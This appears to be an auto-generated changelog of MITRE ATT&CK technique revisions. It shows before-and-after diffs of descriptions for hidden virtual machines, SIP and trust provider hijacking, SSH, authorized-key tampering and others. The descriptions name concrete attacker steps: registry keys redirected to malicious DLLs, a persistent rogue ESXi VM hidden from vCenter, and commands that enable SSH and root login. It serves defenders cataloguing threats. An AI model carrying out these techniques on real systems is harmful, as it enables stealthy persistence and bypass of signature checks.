| t with permissions that enable the virtual instance to inter | | red folder between the guest and host with permissions that |
| act with the host file system.(Citation: Sophos Ragnar May 2 | | enable the virtual instance to interact with the host file s |
| 020) | | ystem.(Citation: Sophos Ragnar May 2020) In VMWare environm |
| | | ents, adversaries may leverage the vCenter console to create |
| | | new virtual machines. However, they may also create virtual |
| | | machines directly on ESXi servers by running a valid `.vmx` |
| | | file with the `/bin/vmx` utility. Adding this command to `/ |
| | | etc/rc.local.d/local.sh` (i.e., [RC Scripts](https://attack. |
| | | mitre.org/techniques/T1037/004)) will cause the VM to persis |
| | | tently restart.(Citation: vNinja Rogue VMs 2024) Creating a |
| | | VM this way prevents it from appearing in the vCenter consol |
| | | e or in the output to the `vim-cmd vmsvc/getallvms` command |
| | | on the ESXi server, thereby hiding it from typical administr |
| | | ative activities.(Citation: MITRE VMware Abuse 2024) |
New Mitigations:
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-14 22:21:59.708000+00:00 | 2025-04-15 19:58:59.831000+00:00 |
| description | Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020) | Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance.(Citation: CyberCX Akira Ransomware) Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)
In VMWare environments, adversaries may leverage the vCenter console to create new virtual machines. However, they may also create virtual machines directly on ESXi servers by running a valid `.vmx` file with the `/bin/vmx` utility. Adding this command to `/etc/rc.local.d/local.sh` (i.e., [RC Scripts](https://attack.mitre.org/techniques/T1037/004)) will cause the VM to persistently restart.(Citation: vNinja Rogue VMs 2024) Creating a VM this way prevents it from appearing in the vCenter console or in the output to the `vim-cmd vmsvc/getallvms` command on the ESXi server, thereby hiding it from typical administrative activities.(Citation: MITRE VMware Abuse 2024) |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'vNinja Rogue VMs 2024', 'description': 'Christian Mohn. (2024, November 11). Beware Of The Rogue VMs!. Retrieved March 26, 2025.', 'url': 'https://vninja.net/2024/11/11/beware-of-the-rogue-vms/'} |
| external_references | | {'source_name': 'CyberCX Akira Ransomware', 'description': 'CyberCX. (2023, September 15). Weaponising VMs to bypass EDR – Akira ransomware. Retrieved April 4, 2025.', 'url': 'https://cybercx.com.au/blog/akira-ransomware/'} |
| external_references | | {'source_name': 'MITRE VMware Abuse 2024', 'description': 'Lex Crumpton. (2024, May 22). Infiltrating Defenses: Abusing VMware in MITRE’s Cyber Intrusion. Retrieved March 26, 2025.', 'url': 'https://medium.com/mitre-engenuity/infiltrating-defenses-abusing-vmware-in-mitres-cyber-intrusion-4ea647b83f5b'} |
| x_mitre_platforms | | ESXi |
[T1218.011] System Binary Proxy Execution: Rundll32
Current version: 2.4
Version changed from: 2.3 → 2.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control', 'Anti-virus'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 13:14:43.083000+00:00 | 2025-04-15 19:58:02.470000+00:00 |
| x_mitre_version | 2.3 | 2.4 |
[T1134.005] Access Token Manipulation: SID-History Injection
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-02-09 15:49:58.414000+00:00 | 2025-04-15 19:59:00.556000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1553.003] Subvert Trust Controls: SIP and Trust Provider Hijacking
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may tamper with SIP and trust provider component | t | Adversaries may tamper with SIP and trust provider component |
| s to mislead the operating system and application control to | | s to mislead the operating system and application control to |
| ols when conducting signature validation checks. In user mod | | ols when conducting signature validation checks. In user mod |
| e, Windows Authenticode (Citation: Microsoft Authenticode) d | | e, Windows Authenticode (Citation: Microsoft Authenticode) d |
| igital signatures are used to verify a file's origin and int | | igital signatures are used to verify a file's origin and int |
| egrity, variables that may be used to establish trust in sig | | egrity, variables that may be used to establish trust in sig |
| ned code (ex: a driver with a valid Microsoft signature may | | ned code (ex: a driver with a valid Microsoft signature may |
| be handled as safe). The signature validation process is han | | be handled as safe). The signature validation process is han |
| dled via the WinVerifyTrust application programming interfac | | dled via the WinVerifyTrust application programming interfac |
| e (API) function, (Citation: Microsoft WinVerifyTrust) whic | | e (API) function, (Citation: Microsoft WinVerifyTrust) whic |
| h accepts an inquiry and coordinates with the appropriate tr | | h accepts an inquiry and coordinates with the appropriate tr |
| ust provider, which is responsible for validating parameters | | ust provider, which is responsible for validating parameters |
| of a signature. (Citation: SpectorOps Subverting Trust Sept | | of a signature. (Citation: SpectorOps Subverting Trust Sept |
| 2017) Because of the varying executable file types and cor | | 2017) Because of the varying executable file types and cor |
| responding signature formats, Microsoft created software com | | responding signature formats, Microsoft created software com |
| ponents called Subject Interface Packages (SIPs) (Citation: | | ponents called Subject Interface Packages (SIPs) (Citation: |
| EduardosBlog SIPs July 2008) to provide a layer of abstracti | | EduardosBlog SIPs July 2008) to provide a layer of abstracti |
| on between API functions and files. SIPs are responsible for | | on between API functions and files. SIPs are responsible for |
| enabling API functions to create, retrieve, calculate, and | | enabling API functions to create, retrieve, calculate, and |
| verify signatures. Unique SIPs exist for most file formats ( | | verify signatures. Unique SIPs exist for most file formats ( |
| Executable, PowerShell, Installer, etc., with catalog signin | | Executable, PowerShell, Installer, etc., with catalog signin |
| g providing a catch-all (Citation: Microsoft Catalog Files | | g providing a catch-all (Citation: Microsoft Catalog Files |
| and Signatures April 2017)) and are identified by globally u | | and Signatures April 2017)) and are identified by globally u |
| nique identifiers (GUIDs). (Citation: SpectorOps Subverting | | nique identifiers (GUIDs). (Citation: SpectorOps Subverting |
| Trust Sept 2017) Similar to [Code Signing](https://attack.m | | Trust Sept 2017) Similar to [Code Signing](https://attack.m |
| itre.org/techniques/T1553/002), adversaries may abuse this a | | itre.org/techniques/T1553/002), adversaries may abuse this a |
| rchitecture to subvert trust controls and bypass security po | | rchitecture to subvert trust controls and bypass security po |
| licies that allow only legitimately signed code to execute o | | licies that allow only legitimately signed code to execute o |
| n a system. Adversaries may hijack SIP and trust provider co | | n a system. Adversaries may hijack SIP and trust provider co |
| mponents to mislead operating system and application control | | mponents to mislead operating system and application control |
| tools to classify malicious (or any) code as signed by: (Ci | | tools to classify malicious (or any) code as signed by: (Ci |
| tation: SpectorOps Subverting Trust Sept 2017) * Modifying | | tation: SpectorOps Subverting Trust Sept 2017) * Modifying |
| the <code>Dll</code> and <code>FuncName</code> Registry valu | | the <code>Dll</code> and <code>FuncName</code> Registry valu |
| es in <code>HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptograp | | es in <code>HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptograp |
| hy\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} | | hy\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} |
| </code> that point to the dynamic link library (DLL) providi | | </code> that point to the dynamic link library (DLL) providi |
| ng a SIP’s CryptSIPDllGetSignedDataMsg function, which retri | | ng a SIP’s CryptSIPDllGetSignedDataMsg function, which retri |
| eves an encoded digital certificate from a signed file. By p | | eves an encoded digital certificate from a signed file. By p |
| ointing to a maliciously-crafted DLL with an exported functi | | ointing to a maliciously-crafted DLL with an exported functi |
| on that always returns a known good signature value (ex: a M | | on that always returns a known good signature value (ex: a M |
| icrosoft signature for Portable Executables) rather than the | | icrosoft signature for Portable Executables) rather than the |
| file’s real signature, an adversary can apply an acceptable | | file’s real signature, an adversary can apply an acceptable |
| signature value to all files using that SIP (Citation: GitH | | signature value to all files using that SIP (Citation: GitH |
| ub SIP POC Sept 2017) (although a hash mismatch will likely | | ub SIP POC Sept 2017) (although a hash mismatch will likely |
| occur, invalidating the signature, since the hash returned b | | occur, invalidating the signature, since the hash returned b |
| y the function will not match the value computed from the fi | | y the function will not match the value computed from the fi |
| le). * Modifying the <code>Dll</code> and <code>FuncName</co | | le). * Modifying the <code>Dll</code> and <code>FuncName</co |
| de> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Mic | | de> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Mic |
| rosoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndi | | rosoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndi |
| rectData\{SIP_GUID}</code> that point to the DLL providing a | | rectData\{SIP_GUID}</code> that point to the DLL providing a |
| SIP’s CryptSIPDllVerifyIndirectData function, which validat | | SIP’s CryptSIPDllVerifyIndirectData function, which validat |
| es a file’s computed hash against the signed hash value. By | | es a file’s computed hash against the signed hash value. By |
| pointing to a maliciously-crafted DLL with an exported funct | | pointing to a maliciously-crafted DLL with an exported funct |
| ion that always returns TRUE (indicating that the validation | | ion that always returns TRUE (indicating that the validation |
| was successful), an adversary can successfully validate any | | was successful), an adversary can successfully validate any |
| file (with a legitimate signature) using that SIP (Citation | | file (with a legitimate signature) using that SIP (Citation |
| : GitHub SIP POC Sept 2017) (with or without hijacking the p | | : GitHub SIP POC Sept 2017) (with or without hijacking the p |
| reviously mentioned CryptSIPDllGetSignedDataMsg function). T | | reviously mentioned CryptSIPDllGetSignedDataMsg function). T |
| his Registry value could also be redirected to a suitable ex | | his Registry value could also be redirected to a suitable ex |
| ported function from an already present DLL, avoiding the re | | ported function from an already present DLL, avoiding the re |
| quirement to drop and execute a new file on disk. * Modifyin | | quirement to drop and execute a new file on disk. * Modifyin |
| g the <code>DLL</code> and <code>Function</code> Registry va | | g the <code>DLL</code> and <code>Function</code> Registry va |
| lues in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptogr | | lues in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptogr |
| aphy\Providers\Trust\FinalPolicy\{trust provider GUID}</code | | aphy\Providers\Trust\FinalPolicy\{trust provider GUID}</code |
| > that point to the DLL providing a trust provider’s FinalPo | | > that point to the DLL providing a trust provider’s FinalPo |
| licy function, which is where the decoded and parsed signatu | | licy function, which is where the decoded and parsed signatu |
| re is checked and the majority of trust decisions are made. | | re is checked and the majority of trust decisions are made. |
| Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData fun | | Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData fun |
| ction, this value can be redirected to a suitable exported f | | ction, this value can be redirected to a suitable exported f |
| unction from an already present DLL or a maliciously-crafted | | unction from an already present DLL or a maliciously-crafted |
| DLL (though the implementation of a trust provider is compl | | DLL (though the implementation of a trust provider is compl |
| ex). * **Note:** The above hijacks are also possible without | | ex). * **Note:** The above hijacks are also possible without |
| modifying the Registry via [DLL Search Order Hijacking](htt | | modifying the Registry via [DLL](https://attack.mitre.org/t |
| ps://attack.mitre.org/techniques/T1574/001). Hijacking SIP | | echniques/T1574/001) search order hijacking. Hijacking SIP |
| or trust provider components can also enable persistent code | | or trust provider components can also enable persistent code |
| execution, since these malicious components may be invoked | | execution, since these malicious components may be invoked |
| by any application that performs code signing or signature v | | by any application that performs code signing or signature v |
| alidation. (Citation: SpectorOps Subverting Trust Sept 2017) | | alidation. (Citation: SpectorOps Subverting Trust Sept 2017) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Autoruns Analysis', 'Digital Certificate Validation', 'User Mode Signature Validation', 'Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-05 04:58:58.214000+00:00 | 2025-04-15 19:58:31.965000+00:00 |
| description | Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017) | Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking.
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017) |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1021.002] Remote Services: SMB/Windows Admin Shares
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['SMB enabled; Host/network firewalls not blocking SMB ports between source and destination; Use of domain account in administrator group on remote system or default system admin account.'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-07-28 17:34:51.250000+00:00 | 2025-04-15 19:58:29.701000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[T1602.001] Data from Configuration Repository: SNMP (MIB Dump)
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-22 01:54:22.812000+00:00 | 2025-04-15 19:59:19.943000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1021.004] Remote Services: SSH
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may use [Valid Accounts](https://attack.mitre.or | t | Adversaries may use [Valid Accounts](https://attack.mitre.or |
| g/techniques/T1078) to log into remote machines using Secure | | g/techniques/T1078) to log into remote machines using Secure |
| Shell (SSH). The adversary may then perform actions as the | | Shell (SSH). The adversary may then perform actions as the |
| logged-on user. SSH is a protocol that allows authorized us | | logged-on user. SSH is a protocol that allows authorized us |
| ers to open remote shells on other computers. Many Linux and | | ers to open remote shells on other computers. Many Linux and |
| macOS versions come with SSH installed by default, although | | macOS versions come with SSH installed by default, although |
| typically disabled until the user enables it. The SSH serve | | typically disabled until the user enables it. On ESXi, SSH |
| r can be configured to use standard password authentication | | can be enabled either directly on the host (e.g., via `vim-c |
| or public-private keypairs in lieu of or in addition to a pa | | md hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESX |
| ssword. In this authentication scenario, the user’s public k | | i Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Cit |
| ey must be in a special file on the computer running the ser | | ation: Sygnia Abyss Locker 2025) The SSH server can be confi |
| ver that lists which keypairs are allowed to login as that u | | gured to use standard password authentication or public-priv |
| ser. | | ate keypairs in lieu of or in addition to a password. In thi |
| | | s authentication scenario, the user’s public key must be in |
| | | a special file on the computer running the server that lists |
| | | which keypairs are allowed to login as that user (i.e., [SS |
| | | H Authorized Keys](https://attack.mitre.org/techniques/T1098 |
| | | /004)). |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | ['Janantha Marasinghe'] |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['An SSH server is configured and running.'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-11 20:24:03.069000+00:00 | 2025-04-15 19:58:17.607000+00:00 |
| description | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user. | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)). |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Sygnia Abyss Locker 2025', 'description': 'Abigail See, Zhongyuan (Aaron) Hau, Ren Jie Yow, Yoav Mazor, Omer Kidron, and Oren Biderman. (2025, February 4). The Anatomy of Abyss Locker Ransomware Attack. Retrieved April 4, 2025.', 'url': 'https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/'} |
| external_references | | {'source_name': 'TrendMicro ESXI Ransomware', 'description': 'Junestherry Dela Cruz. (2022, January 24). Analysis and Impact of LockBit Ransomware’s First Linux and VMware ESXi Variant. Retrieved March 26, 2025.', 'url': 'https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html'} |
| external_references | | {'source_name': 'Sygnia ESXi Ransomware 2025', 'description': 'Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.', 'url': 'https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/'} |
| x_mitre_platforms | | ESXi |
[T1098.004] Account Manipulation: SSH Authorized Keys
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
|---|
| t | Adversaries may modify the SSH <code>authorized_keys</code> | t | Adversaries may modify the SSH <code>authorized_keys</code> |
| file to maintain persistence on a victim host. Linux distrib | | file to maintain persistence on a victim host. Linux distrib |
| utions and macOS commonly use key-based authentication to se | | utions, macOS, and ESXi hypervisors commonly use key-based a |
| cure the authentication process of SSH sessions for remote m | | uthentication to secure the authentication process of SSH se |
| anagement. The <code>authorized_keys</code> file in SSH spec | | ssions for remote management. The <code>authorized_keys</cod |
| ifies the SSH keys that can be used for logging into the use | | e> file in SSH specifies the SSH keys that can be used for l |
| r account for which the file is configured. This file is usu | | ogging into the user account for which the file is configure |
| ally found in the user's home directory under <code><user | | d. This file is usually found in the user's home directory u |
| -home>/.ssh/authorized_keys</code>.(Citation: SSH Authori | | nder <code><user-home>/.ssh/authorized_keys</code> (or |
| zed Keys) Users may edit the system’s SSH config file to mod | | , on ESXi, `/etc/ssh/keys-<username>/authorized_keys`).(Cita |
| ify the directives PubkeyAuthentication and RSAAuthenticatio | | tion: SSH Authorized Keys) Users may edit the system’s SSH c |
| n to the value “yes” to ensure public key and RSA authentica | | onfig file to modify the directives `PubkeyAuthentication` a |
| tion are enabled. The SSH config file is usually located und | | nd `RSAAuthentication` to the value `yes` to ensure public k |
| er <code>/etc/ssh/sshd_config</code>. Adversaries may modif | | ey and RSA authentication are enabled, as well as modify the |
| y SSH <code>authorized_keys</code> files directly with scrip | | directive `PermitRootLogin` to the value `yes` to enable ro |
| ts or shell commands to add their own adversary-supplied pub | | ot authentication via SSH.(Citation: Broadcom ESXi SSH) The |
| lic keys. In cloud environments, adversaries may be able to | | SSH config file is usually located under <code>/etc/ssh/sshd |
| modify the SSH authorized_keys file of a particular virtual | | _config</code>. Adversaries may modify SSH <code>authorized |
| machine via the command line interface or rest API. For exam | | _keys</code> files directly with scripts or shell commands t |
| ple, by using the Google Cloud CLI’s “add-metadata” command | | o add their own adversary-supplied public keys. In cloud env |
| an adversary may add SSH keys to a user account.(Citation: G | | ironments, adversaries may be able to modify the SSH authori |
| oogle Cloud Add Metadata)(Citation: Google Cloud Privilege E | | zed_keys file of a particular virtual machine via the comman |
| scalation) Similarly, in Azure, an adversary may update the | | d line interface or rest API. For example, by using the Goog |
| authorized_keys file of a virtual machine via a PATCH reques | | le Cloud CLI’s “add-metadata” command an adversary may add S |
| t to the API.(Citation: Azure Update Virtual Machines) This | | SH keys to a user account.(Citation: Google Cloud Add Metada |
| ensures that an adversary possessing the corresponding priva | | ta)(Citation: Google Cloud Privilege Escalation) Similarly, |
| te key may log in as an existing user via SSH.(Citation: Ven | | in Azure, an adversary may update the authorized_keys file o |
| afi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It | | f a virtual machine via a PATCH request to the API.(Citation |
| may also lead to privilege escalation where the virtual mach | | : Azure Update Virtual Machines) This ensures that an advers |
| ine or instance has distinct permissions from the requesting | | ary possessing the corresponding private key may log in as a |
| user. Where authorized_keys files are modified via cloud A | | n existing user via SSH.(Citation: Venafi SSH Key Abuse)(Cit |
| PIs or command line interfaces, an adversary may achieve pri | | ation: Cybereason Linux Exim Worm) It may also lead to privi |
| vilege escalation on the target virtual machine if they add | | lege escalation where the virtual machine or instance has di |
| a key to a higher-privileged user. SSH keys can also be ad | | stinct permissions from the requesting user. Where authoriz |
| ded to accounts on network devices, such as with the `ip ssh | | ed_keys files are modified via cloud APIs or command line in |
| pubkey-chain` [Network Device CLI](https://attack.mitre.org | | terfaces, an adversary may achieve privilege escalation on t |
| /techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubke | | he target virtual machine if they add a key to a higher-priv |
| y_ch_cmd) | | ileged user. SSH keys can also be added to accounts on net |
| | | work devices, such as with the `ip ssh pubkey-chain` [Networ |
| | | k Device CLI](https://attack.mitre.org/techniques/T1059/008) |
| | | command.(Citation: cisco_ip_ssh_pubkey_ch_cmd) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-03 17:38:21.121000+00:00 | 2025-04-15 19:58:39.342000+00:00 |
